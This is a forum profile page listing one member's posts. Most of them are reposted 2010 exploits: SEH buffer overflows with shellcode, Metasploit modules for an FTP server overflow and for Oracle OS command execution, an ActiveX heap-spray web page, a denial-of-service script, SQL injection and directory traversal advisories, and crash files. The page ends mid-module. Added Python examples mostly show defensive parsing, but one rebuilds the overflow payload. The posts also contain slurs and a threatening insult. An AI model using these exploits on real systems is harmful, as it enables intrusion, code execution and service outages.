ANdreicj (Active Members, 245 posts)

Everything posted by ANdreicj

  1. Copy & paste .. P.S.: Are you retarded, man? You could at least have checked the links before posting them.
  2. Hmmm, I wonder whether everyone on hackforums is like him? )
  3. # Exploit Title: ArGoSoft FTP Server .NET v.1.0.2.1 directory traversal
     # Date: 16.03.2010
     # Author: dmnt
     # Software Link: http://www.argosoft.com/files/apps/FtpServerSetup.msi
     # Version: ArGoSoft FTP Server .NET v.1.0.2.1
     # Tested on: Windows 7
     # Code :
     CWD ...
     250 Requested file action OK, completed
     XPWD
     257 "/.../" is working directory
     CWD ...
     250 Requested file action OK, completed
     XPWD
     257 "/.../.../" is working directory
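The transcript above shows the server accepting "..." as a directory name and happily reporting "/.../.../" as the working directory. As an added example (my code, not dmnt's advisory and not ArGoSoft's), here is the difference between a filter that only refuses the literal ".." component and a resolver that normalises the virtual path first and refuses anything that should never reach the OS. ROOT, the component rule and the note about Win32 stripping trailing dots are assumptions of the example, not statements from the advisory.

```python
import posixpath
import re

# Added example, not part of dmnt's advisory or of ArGoSoft's code.
ROOT = "/srv/ftp"  # assumed on-disk root of the virtual filesystem


def naive_is_traversal(arg: str) -> bool:
    """The kind of filter the transcript suggests: only the exact component
    ".." is refused, so "..." is handed to the OS as an ordinary name."""
    return any(part == ".." for part in arg.replace("\\", "/").split("/"))


# Allowed names: no separators, no control characters, and not a name made
# only of dots. (Assumption about the target platform: Win32 path handling
# strips trailing dots, so "..." is not a safe literal directory name.)
SAFE_COMPONENT = re.compile(r"^(?!\.+$)[^/\\\x00-\x1f]+$")


def resolve_cwd(cwd: str, arg: str) -> str:
    """New virtual working directory for `CWD arg`, clamped to "/".

    Every ".." is collapsed by posixpath.normpath on the *virtual* path, so
    the result is always absolute and never above "/"; only afterwards is it
    mapped onto ROOT. Components that must never reach the OS raise ValueError.
    """
    target = arg if arg.startswith("/") else posixpath.join(cwd, arg)
    for part in target.split("/"):
        if part in ("", ".", ".."):
            continue  # collapsed by normpath below
        if not SAFE_COMPONENT.match(part):
            raise ValueError(f"illegal path component: {part!r}")
    normalized = posixpath.normpath(target)
    return normalized if normalized.startswith("/") else "/"


def cwd_is_rejected(cwd: str, arg: str) -> bool:
    """True when resolve_cwd refuses the request outright."""
    try:
        resolve_cwd(cwd, arg)
    except ValueError:
        return True
    return False


def to_os_path(virtual: str) -> str:
    """Map an already-clamped virtual path under ROOT; `virtual` is absolute
    and normalised, so the join cannot climb out of ROOT."""
    return posixpath.normpath(posixpath.join(ROOT, virtual.lstrip("/")))
```

The point is the order of operations: clamp the virtual path first, then map it to disk, and never let the OS see a component you have not vetted. The naive filter returns False for "...", which is exactly the case the transcript exercises.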
  4. #!/usr/bin/perl
     # Title: myMP3-Player v3.0 (.m3u) Local Buffer Overflow Exploit (SEH)
     # Date: 18.03.2010
     # Author: n3w7u
     # Software Link: http://www.chip.de/downloads/myMP3-Player-3.0_13008621.html
     # Version: 3.0; the other versions can't be downloaded from a serious page and aren't free.
     # Tested on: Windows XP SP3 (ger)
     #
     # [ Buffer ][ Short Jump ][ P/P/R ][ NOP ][ Shellcode ][ NOP ]
     use strict;
     use warnings;

     my $file = "evil.m3u";
     my $junk = "\x41" x 1040;        # for myMp3 Player 5/cracked: junk = 1056
     my $jmp  = "\xEB\x08\x90\x90";   # nSEH: jmp short +8, over the handler address into the NOPs
     my $seh  = "\x25\x12\xC8\x72";   # SEH: 0x72C81225 (72 C8 12 25), pop/pop/ret in msacm32.drv
     my $nop  = "\x90" x 20;
     my $nops = "\x90" x 10;

     # windows/exec - 224 bytes
     # http://www.metasploit.com
     # Encoder: x86/call4_dword_xor
     # EXITFUNC=process, CMD=calc.exe
     my $buf =
     "\x2b\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
     "\x0e\xa8\x6e\x77\xce\x83\xee\xfc\xe2\xf4\x54\x86\xfe\xce" .
     "\xa8\x6e\x17\x47\x4d\x5f\xa5\xaa\x23\x3c\x47\x45\xfa\x62" .
     "\xfc\x9c\xbc\xe5\x05\xe6\xa7\xd9\x3d\xe8\x99\x91\x46\x0e" .
     "\x04\x52\x16\xb2\xaa\x42\x57\x0f\x67\x63\x76\x09\x4a\x9e" .
     "\x25\x99\x23\x3c\x67\x45\xea\x52\x76\x1e\x23\x2e\x0f\x4b" .
     "\x68\x1a\x3d\xcf\x78\x3e\xfc\x86\xb0\xe5\x2f\xee\xa9\xbd" .
     "\x94\xf2\xe1\xe5\x43\x45\xa9\xb8\x46\x31\x99\xae\xdb\x0f" .
     "\x67\x63\x76\x09\x90\x8e\x02\x3a\xab\x13\x8f\xf5\xd5\x4a" .
     "\x02\x2c\xf0\xe5\x2f\xea\xa9\xbd\x11\x45\xa4\x25\xfc\x96" .
     "\xb4\x6f\xa4\x45\xac\xe5\x76\x1e\x21\x2a\x53\xea\xf3\x35" .
     "\x16\x97\xf2\x3f\x88\x2e\xf0\x31\x2d\x45\xba\x85\xf1\x93" .
     "\xc2\x6f\xfa\x4b\x11\x6e\x77\xce\xf8\x06\x46\x45\xc7\xe9" .
     "\x88\x1b\x13\x9e\xc2\x6c\xfe\x06\xd1\x5b\x15\xf3\x88\x1b" .
     "\x94\x68\x0b\xc4\x28\x95\x97\xbb\xad\xd5\x30\xdd\xda\x01" .
     "\x1d\xce\xfb\x91\xa2\xad\xc9\x02\x14\xe0\xcd\x16\x12\xce";

     open(my $fh, '>', $file) or die "Cannot write $file: $!";
     binmode($fh);   # raw bytes: no newline translation on Windows
     print $fh $junk . $jmp . $seh . $nop . $buf . $nops;
     close($fh);
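The interesting numbers in that script are the offsets: nSEH at 1040, the handler address four bytes later, and a `jmp short` whose displacement is measured from the end of its own two-byte encoding. As an added example (mine, not n3w7u's), the builder below reproduces the same layout with the offsets made explicit and checkable, so a mistake in the displacement or in the byte order of the P/P/R address shows up before the file is fed to the player. The shellcode is a constructed stand-in, not the 224-byte windows/exec payload from the post.

```python
import struct

# Added example, not n3w7u's code: builds the post's [junk][nSEH][SEH][NOP]
# [shellcode][NOP] layout with explicit offsets so each field can be checked
# before the .m3u is written.


def short_jmp(skip_bytes: int) -> bytes:
    """`jmp short rel8` (EB xx) padded to the 4-byte nSEH slot. rel8 counts
    from the end of the 2-byte instruction: EB 08 skips the 2 padding NOPs,
    the 4-byte handler address and the first 2 bytes of the sled (2+4+2)."""
    if not 0 <= skip_bytes <= 0x7F:
        raise ValueError("forward rel8 displacement must be 0..127")
    return bytes([0xEB, skip_bytes]) + b"\x90\x90"


def build_seh_payload(junk_len: int, ppr_addr: int, shellcode: bytes,
                      nops_before: int = 20, nops_after: int = 10) -> bytes:
    """junk_len is the offset at which the nSEH field is overwritten; ppr_addr
    is the pop/pop/ret gadget, written little-endian over the SEH handler."""
    return (b"\x41" * junk_len
            + short_jmp(8)
            + struct.pack("<I", ppr_addr)
            + b"\x90" * nops_before
            + shellcode
            + b"\x90" * nops_after)


def layout(junk_len: int, nops_before: int = 20) -> dict:
    """Byte offsets of each field, for sanity-checking the exploit's numbers."""
    nseh = junk_len
    seh = nseh + 4
    sled = seh + 4
    return {
        "nSEH": nseh,
        "SEH": seh,
        "sled": sled,
        "jmp_lands_at": nseh + 2 + 8,   # EB 08: next instruction + 8
        "shellcode": sled + nops_before,
    }


def seh_address_from_bytes(field: bytes) -> int:
    """Read the handler field back the way the CPU does (little-endian)."""
    return struct.unpack("<I", field)[0]


# Constructed stand-in for the 224-byte windows/exec shellcode in the post
FAKE_SHELLCODE = b"\xcc" * 224

if __name__ == "__main__":
    data = build_seh_payload(1040, 0x72C81225, FAKE_SHELLCODE)  # offsets from the post
    with open("evil.m3u", "wb") as fh:
        fh.write(data)
```

`layout(1040)` confirms that the jump lands at offset 1050, two bytes into the NOP sled and well before the shellcode, and `seh_address_from_bytes` turns the post's `"\x25\x12\xC8\x72"` back into 0x72C81225, which is the address the comment spells out byte by byte.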
  5. # Exploit Title: mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day
     # Date: 17/03/2010
     # Author: Pietro Oliva
     # Software Link:
     # Version: <= 4.4.1
     # Tested on: ubuntu 9.10 but should work in windows too
     # CVE :
     #
     # Program received signal SIGSEGV, Segmentation fault.
     # 0x081176d8 in af_calc_filter_multiplier ()
     # (gdb) disas af_calc_filter_multiplier
     # Dump of assembler code for function af_calc_filter_multiplier:
     # 0x081176d0 <af_calc_filter_multiplier+0>:  push %ebp
     # 0x081176d1 <af_calc_filter_multiplier+1>:  mov %esp,%ebp
     # 0x081176d3 <af_calc_filter_multiplier+3>:  fld1
     # 0x081176d5 <af_calc_filter_multiplier+5>:  mov 0x8(%ebp),%eax
     # 0x081176d8 <af_calc_filter_multiplier+8>:  mov (%eax),%eax      ==> mplayer tries to dereference eax, which is a NULL pointer!!!
     # 0x081176da <af_calc_filter_multiplier+10>: lea 0x0(%esi),%esi
     # 0x081176e0 <af_calc_filter_multiplier+16>: fmull 0x28(%eax)
     # 0x081176e3 <af_calc_filter_multiplier+19>: mov 0x18(%eax),%eax
     # 0x081176e6 <af_calc_filter_multiplier+22>: test %eax,%eax
     # 0x081176e8 <af_calc_filter_multiplier+24>: jne 0x81176e0 <af_calc_filter_multiplier+16>
     # 0x081176ea <af_calc_filter_multiplier+26>: pop %ebp
     # 0x081176eb <af_calc_filter_multiplier+27>: ret
     # End of assembler dump.
     #
     # REGISTERS:
     # eax     0x0          0                 ==========> NULL
     # ecx     0xfa157a57   -99255721
     # edx     0x1fe0       8160
     # ebx     0x8509a08    139500040
     # esp     0xbfffe2e8   0xbfffe2e8
     # ebp     0xbfffe2e8   0xbfffe2e8
     # esi     0x7b84000    129515520
     # edi     0xf8000      1015808
     # eip     0x81176d8    0x81176d8 <af_calc_filter_multiplier+8>
     # eflags  0x10216      [ PF AF IF RF ]
     # cs      0x73         115
     # ss      0x7b         123
     # ds      0x7b         123
     # es      0x7b         123
     # fs      0x0          0
     # gs      0x33         51

     #!/usr/bin/perl
     use strict;
     use warnings;

     print "[+] mplayer <= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Oliva\n";
     print "[+] pietroliva[at]gmail[dot]com http://olivapietro.altervista.org\n";
     print "[+] creating crafted file mplayer.wav\n";

     # "RIFF", size 0x41f, "WAVE", "fmt " chunk declaring 16 bytes but cut off
     # after the PCM format tag (01 00) and a single byte (0x1f) of the channel count
     my $buffer = "\x52\x49\x46\x46\x1f\x04\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20\x10\x00\x00\x00\x01\x00\x1f";

     open(my $fh, '>', "mplayer.wav") or die "Cannot write mplayer.wav: $!";
     binmode($fh);
     print $fh $buffer;
     close($fh);
     print "[+] done!\n";
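The crafted file is a RIFF header that promises a 16-byte "fmt " chunk and delivers three bytes of it. As an added example (mine, not Pietro Oliva's PoC and not mplayer's code), here is the kind of header parser a decoder needs: every declared length is checked against the bytes actually present, and a format block with zero channels, zero sample rate or zero bit depth is refused before any filter chain is built from it. `POC_WAV` is the PoC's 23 bytes; `make_pcm_header` constructs a well-formed header for comparison.

```python
import struct
from typing import Optional

# Added example, not Pietro Oliva's code: a RIFF/WAVE header parser that checks
# every declared length against the bytes actually present, run over the PoC file.

# The 23 bytes the PoC writes (copied from the post): RIFF size 0x41f, "WAVE",
# an "fmt " chunk declaring 16 bytes but supplying only the PCM tag and one byte.
POC_WAV = (b"RIFF" + b"\x1f\x04\x00\x00" + b"WAVE"
           + b"fmt " + b"\x10\x00\x00\x00" + b"\x01\x00" + b"\x1f")


class WavError(ValueError):
    pass


def parse_fmt(data: bytes) -> dict:
    """Return the PCM format fields, or raise WavError for anything a decoder
    must not act on (missing bytes, zero channels/rate/bits, no fmt chunk)."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise WavError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        chunk_id, chunk_size = struct.unpack_from("<4sI", data, pos)
        body = data[pos + 8:pos + 8 + chunk_size]
        if len(body) < chunk_size:
            raise WavError(f"chunk {chunk_id!r} truncated: declares "
                           f"{chunk_size} bytes, has {len(body)}")
        if chunk_id == b"fmt ":
            if chunk_size < 16:
                raise WavError("fmt chunk shorter than 16 bytes")
            tag, channels, rate, byte_rate, align, bits = struct.unpack_from("<HHIIHH", body)
            if channels == 0 or rate == 0 or bits == 0:
                raise WavError("zero channel count, sample rate or bit depth")
            return {"format_tag": tag, "channels": channels, "sample_rate": rate,
                    "byte_rate": byte_rate, "block_align": align, "bits": bits}
        pos += 8 + chunk_size + (chunk_size & 1)   # chunk bodies are word-aligned
    raise WavError("no fmt chunk before end of data")


def reject_reason(data: bytes) -> Optional[str]:
    """None when the header is usable, otherwise the reason it was refused."""
    try:
        parse_fmt(data)
    except WavError as e:
        return str(e)
    return None


def make_pcm_header(channels: int, rate: int, bits: int, data_len: int = 0) -> bytes:
    """Constructed well-formed PCM header (fmt + empty data chunk) for comparison."""
    block_align = channels * bits // 8
    fmt = struct.pack("<HHIIHH", 1, channels, rate, rate * block_align, block_align, bits)
    body = (b"WAVE" + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", data_len))
    return b"RIFF" + struct.pack("<I", len(body) + data_len) + body
```

Run over `POC_WAV`, the parser stops at the truncated "fmt " chunk; a header with a zero channel count is refused as well, which is the class of half-initialised format that leaves a decoder walking a filter list that was never set up.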
  6. It's something ordinary .. this topic has no point at all.
  7. Dear Sir / Madam
     The ItSecTeam has discovered a new bug in PHP Classifieds Latest Version and will be glad to report and publish it.
     More information about this bug is listed below:
     =======================================================================================
     Topic    : PHP Classifieds Version 7.5
     Bug type : Blind SQL Injection
     Author   : ItSecTeam
     Remote   : Yes
     Status   : Bug
     ===================== Content ======================
     ( # Advisory Content : PHP Classifieds
     ( # Mail : Bug@ItSecTeam.com
     ( # Find By : Amin Shokohi(Pejvak!)
     ( # Special Tnx : M3hr@n.S , 0xd41684c654 And All Team Members!
     ( # Website : WwW.ItSecTeam.com
     ( # Forum : WwW.Forum.ItSecTeam.com
     =================================================
     ============================================= Exploit 1 =======================================
     ( * http://localhost/phpClassifieds v7.5/ad_click.php?bid=2 SQL Injection Code
     ----------------------------------------------------------------------------------
     <BUG>
     $bid=getParam("bid","");
     if ($bid>0) {
         $sql_banner = "SELECT goto_url FROM $banner_tbl WHERE bid=****$bid****";
         ........
     }
     </Bug>
     ----------------------------------------------------------------------------------
     ===========================================================================================
  8. # Exploit Title: Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow MSF
     # Date: March 14, 2010
     # Author: Blake
     # Software Link: http://sourceforge.net/projects/open-ftpd/files/open-ftpd/binairies.1.2/open-ftpd.1.2.tar.gz/download
     # Version: 1.2
     # Tested on: XP SP3
     # Exploit causes the ftp server to crash so adduser, etc. payloads are most effective.

     require 'msf/core'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = AverageRanking

       include Msf::Exploit::Remote::Ftp

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow',
           'Description'    => %q{
             This module exploits a stack overflow in the USER verb in Open & Compact
             FTPd version 1.2. The program will crash once the payload is sent, so
             bind shell payloads are not effective.
           },
           'Author'         => 'Blake',
           'License'        => MSF_LICENSE,
           'Version'        => 'Version 1',
           'References'     =>
             [
               [ 'EDB-ID', '11420'],
               [ 'URL', 'http://www.exploit-db.com/exploits/11420' ],
             ],
           'Privileged'     => true,
           'DefaultOptions' =>
             {
               'EXITFUNC' => 'process',
             },
           'Payload'        =>
             {
               'Space'           => 400,
               'BadChars'        => "\x00\x20\x0a\x0d",
               'StackAdjustment' => -3500,
             },
           'Platform'       => 'win',
           'Targets'        =>
             [
               [ 'Windows XP SP2/SP3 English', { 'Ret' => 0x00202c42 } ],
             ],
           'DisclosureDate' => 'Feb 12, 2010',
           'DefaultTarget'  => 0))
       end

       def exploit
         connect

         # the low three bytes of Ret (0x00202c42), repeated; the 0x00 high byte is a bad char
         sploit  = "\x42\x2c\x20" * 199
         sploit << make_nops(10)
         sploit << payload.encoded

         print_status("Trying target #{target.name}...")

         login  = "USER #{sploit}\r\n"
         login << "PASS " + rand_text_alphanumeric(12)
         sock.put(login + "\r\n")

         handler
         disconnect
       end
     end
  9. <html>
     <!--
     |------------------------------------------------------------------|
     |                          corelan team                            |
     |                                                                  |
     |                   http://www.corelan.be:8800                     |
     |                   security@corelan.be                            |
     |                                                                  |
     |-------------------------------------------------[ EIP Hunters ]--|

     # Liquid XML Studio 2010 <= v8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote 0day Heap Overflow Exploit
     # Found by: Steven Seeley (mr_me) http://net-ninja.net/
     # Homepage: http://www.liquid-technologies.com/
     # Download: http://www.liquid-technologies.com/Download.aspx
     # Tested on: Windows XP SP3 (IE 6 & 7)
     # Greetz: Corelan Security Team
     # http://www.corelan.be:8800/index.php/security/corelan-team-members/
     # Reference: http://www.exploit-db.com/exploits/7402
     # Thanks to e.wiZz! & shinnai for the reliable js code
     #
     ######################################################################################################
     # Script provided 'as is', without any warranty.
     # Use for educational purposes only.
     # Do not use this code to do anything illegal !
     #
     # Note : you are not allowed to edit/modify this code.
     # If you do, Corelan cannot be held responsible for any damages this may cause.

     ! marked safe for scripting !

     ~~~~~~~ Liquid XML Customers ~~~~~~~
     http://www.liquid-technologies.com/Customers.aspx
     Liquid XML Studio is being used by thousands of organisations around the globe
     including many FTSE 100 and Fortune 100 companies, as part of their business
     critical projects.
     - Australian DoD
     - US DoD
     - Federal Department of Foreign Affairs
     - NSA
     - US Army Material Command
     - Bank of America
     - American Express
     - HSBC Bank
     - Merrill Lynch
     - Microsoft Corporation
     - Cisco Systems
     - etc
     enough said.
     -->
     <object classid='clsid:E68E401C-7DB0-4F3A-88E1-159882468A79' id='boom' ></object>
     <script language="JavaScript" defer>
     //calc.exe
     var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
                          "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
                          "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
                          "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
                          "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
                          "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
                          "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
                          "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
                          "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
                          "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
                          "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
                          "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
                          "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
                          "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
                          "%u652E%u6578%u9000");
     var sSlide = unescape("%u9090%u9090");
     var heapSA = 0x0c0c0c0c;

     function tryMe() {
         var buffSize = 10000;
         var x = unescape("%0a%0a%0a%0a");
         while (x.length < buffSize) x += x;
         x = x.substring(0, buffSize);
         boom.OpenFile(x, 1);
     }

     function getsSlide(sSlide, sSlideSize) {
         while (sSlide.length * 2 < sSlideSize) {
             sSlide += sSlide;
         }
         sSlide = sSlide.substring(0, sSlideSize / 2);
         return (sSlide);
     }

     var heapBS = 0x400000;
     var sizeHDM = 0x5;
     var PLSize = (sCode.length * 2);
     var sSlideSize = heapBS - (PLSize + sizeHDM);
     var heapBlocks = (heapSA + heapBS) / heapBS;
     var memory = new Array();
     sSlide = getsSlide(sSlide, sSlideSize);
     for (i = 0; i < heapBlocks; i++) {
         memory[i] = sSlide + sCode;
     }
     </script>
     <body onload="JavaScript: return tryMe();">
     <p><center>~ mr_me presents ~</center></p>
     <p><b>Liquid XML Studio 2010 <= v8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote 0day Heap Overflow Exploit</b></p>
     </body>
     </html>
  10. #!/usr/bin/perl
      ################################################################################
      #
      # CubilFelino Security Research Labs
      # proudly presents...
      #
      # Embedthis Appweb 3.1.2 Remote DoS
      #
      # Greets: l1l1th (my h4x0r bab3), nitr0us, alt3kx, hkm, r1l0, b0rr3x, w01f,
      # w0lf47, gh0st, CHiP, corelanc0d3r and all the crew of sectester.net.
      #
      ################################################################################
      # Exploit Title: Embedthis Appweb 3.1.2 Remote DoS
      # Date: Mar 12, 2010
      # Author: chr1x
      # Software Link: http://embedthis.com/downloads/index.html
      # Version: 3.1.2
      # Tested on: Windows XP SP3 (Spanish Edition)
      # st4rt of v00d00 c0d3 XD
      use strict;
      use warnings;
      use HTTP::Lite;
      use IO::Socket;
      use locale;

      my $banner = "
      ############################################################
       CubilFelino Security Labs
       Embedthis Appweb 3.1.2 Remote DoS
       by chr1x\@sectester.net
      ############################################################
      ";

      if ($#ARGV != 1) {
          print $banner . "Usage: $0 -h (ip address)\n";
          exit;
      }

      # Variables
      my $DossedIP = $ARGV[1];

      main();

      sub main {
          print $banner;
          # Execution functions
          appWebCheck();
          sleep 30;
          afterDoS();
      }

      sub appWebCheck {
          print "[*] Verifying that AppWeb is running at $DossedIP in port 80\n";
          my $http = HTTP::Lite->new;
          my $req  = $http->request("http://$DossedIP/")
              or die "[*] Remote address $DossedIP seems not to be up, stopped";
          if ($req) {
              print "[*] w00t! Appweb seems to be running! Sending DoS.. XD\n";
              # open and abandon 2000 connections, each with one line of junk
              for (my $i = 1; $i <= 2000; $i++) {
                  my $sock = IO::Socket::INET->new(
                      PeerAddr => $DossedIP,
                      PeerPort => '80',
                      Proto    => 'tcp',
                      Type     => SOCK_STREAM,
                  );
                  if ($sock) {
                      print "[*] Sending Connection request Number: $i\n";
                      print $sock "Die Biatch!";
                      close($sock);
                  }
              }
          }
      }

      sub afterDoS {
          my $http = HTTP::Lite->new;
          my $req  = $http->request("http://$DossedIP/")
              or die "[*] Webserver DoSsed!! Port 80 is unreachable now.";
      }
  11. # SWINGETTE 1.1 (.mp3) Buffer Overflow DOS Exploit
      # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      #  Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)
      #
      #  [+] Site : Inj3ct0r.com
      #  [+] Support e-mail : submit[at]inj3ct0r.com
      #
      #  I'm cr4wl3r member from Inj3ct0r Team
      # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      #[+] Discovered By: cr4wl3r
      use strict;
      use warnings;

      # the file must be opened before anything is printed to it
      open(my $mp3, '>', "sploit.mp3") or die "Cannot write sploit.mp3: $!";
      binmode($mp3);
      print $mp3 "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
      print $mp3 "\x4D\x54\x68\x64";   # "MThd"
      print $mp3 "\x4D\x54\x68\x64";
      print $mp3 "\x4D\x54\x68\x64";
      print $mp3 "\x4D\x54\x68\x64";
      close($mp3);

      # Note: you only got an email account??? bruakakaka. Hey dog, just ask the FO directly. What did I get???
      # Weren't you the one who emailed the FO to get your site linked??? The FO still hasn't replied to you, because he knows you're an idiot.
      # What did you say??? My family??? wkwkwkwkwk. You haven't even been weaned off your mother and you want to pick a fight???
      # Hey dog, I know where you are now.
      # Me and my forum friends??? Just look at who is in the special greets??? Who is the one at the very end??? He's from my forum, dog, and you ended up begging him for mercy because your blog still hasn't come back up.
      # Still want to act tough, dog??? With a body that's nothing but a bonus, don't act tough.
      # Lame in Action: http://photos-b.ak.fbcdn.net/hphotos-ak-snc3/hs028.snc3/11559_1259969493634_1061556093_848543_5837025_n.jpg (suck my dick, dog)
  12. ##
      # This file is part of the Metasploit Framework and may be subject to
      # redistribution and commercial restrictions. Please see the Metasploit
      # Framework web site for more information on licensing and terms of use.
      # http://metasploit.com/projects/Framework/
      ##

      require 'msf/core'

      class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::ORACLE

        def initialize(info = {})
          super(update_info(info,
            'Name'           => 'DBMS_JVM_EXP_PERMS 11g R1/R2 OS Code Execution',
            'Description'    => %q{
              This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that
              allows any user with create session privilege to grant themselves java
              IO privileges. Identified by David Litchfield. Works on 11g R1 and R2
              (Windows only).
            },
            'Author'         => [ 'sid[at]notsosecure.com' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 8822 $',
            'References'     =>
              [
                [ 'URL', 'http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield' ],
                [ 'URL', 'http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/' ],
              ],
            'DisclosureDate' => 'Feb 1 2010'))

          register_options(
            [
              OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
            ], self.class)
        end

        def run
          name = Rex::Text.rand_text_alpha(rand(10) + 1)

          # grant the calling user java.io.FilePermission on <<ALL FILES>> through
          # DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS
          package = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" +
                    "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual;" +
                    "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"

          os_code = "select dbms_java.runjava('oracle/aurora/util/Wrapper c:\\\\windows\\\\system32\\\\cmd.exe /c #{datastore['CMD']}')from dual"

          begin
            print_status("Attempting to grant JAVA IO Privileges")
            prepare_exec(package)
            print_status("Attempting to execute OS Code")
            prepare_exec(os_code)
          rescue => e
            print_status("Error: #{e.class} #{e}")
          end
        end
      end

      ---------------------------------------

      ##
      # This file is part of the Metasploit Framework and may be subject to
      # redistribution and commercial restrictions. Please see the Metasploit
      # Framework web site for more information on licensing and terms of use.
      # http://metasploit.com/projects/Framework/
      ##

      require 'msf/core'

      class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::ORACLE

        def initialize(info = {})
          super(update_info(info,
            'Name'           => 'DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution',
            'Description'    => %q{
              This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that
              allows any user with create session privilege to grant themselves java
              IO privileges. Identified by David Litchfield. Works on 10g R2, 11g R1
              and R2 (Windows only).
            },
            'Author'         => [ 'sid[at]notsosecure.com' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 8822 $',
            'References'     =>
              [
                [ 'URL', 'http://blackhat.com/html/bh-dc-10/bh-dc-10-archives.html#Litchfield' ],
                [ 'URL', 'http://www.notsosecure.com/folder2/2010/02/04/hacking-oracle-11g/' ],
              ],
            'DisclosureDate' => 'Feb 1 2010'))

          register_options(
            [
              OptString.new('CMD', [ false, 'CMD to execute.', "echo metasploit >> %SYSTEMDRIVE%\\\\unbreakable.txt"]),
            ], self.class)
        end

        def run
          name = Rex::Text.rand_text_alpha(rand(10) + 1)

          # three grants: java.io.FilePermission on <<ALL FILES>>, then the
          # java.lang.RuntimePermission writeFileDescriptor / readFileDescriptor
          package1 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" +
                     "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.io.FilePermission','<<ALL FILES>>','execute','ENABLED' from dual;" +
                     "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
          package2 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" +
                     "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','writeFileDescriptor',NULL,'ENABLED' FROM DUAL;" +
                     "BEGIN OPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;"
          package3 = "DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;" +
                     "CURSOR C1 IS SELECT 'GRANT',USER(), 'SYS','java.lang.RuntimePermission','readFileDescriptor',NULL,'ENABLED' FROM DUAL;" +
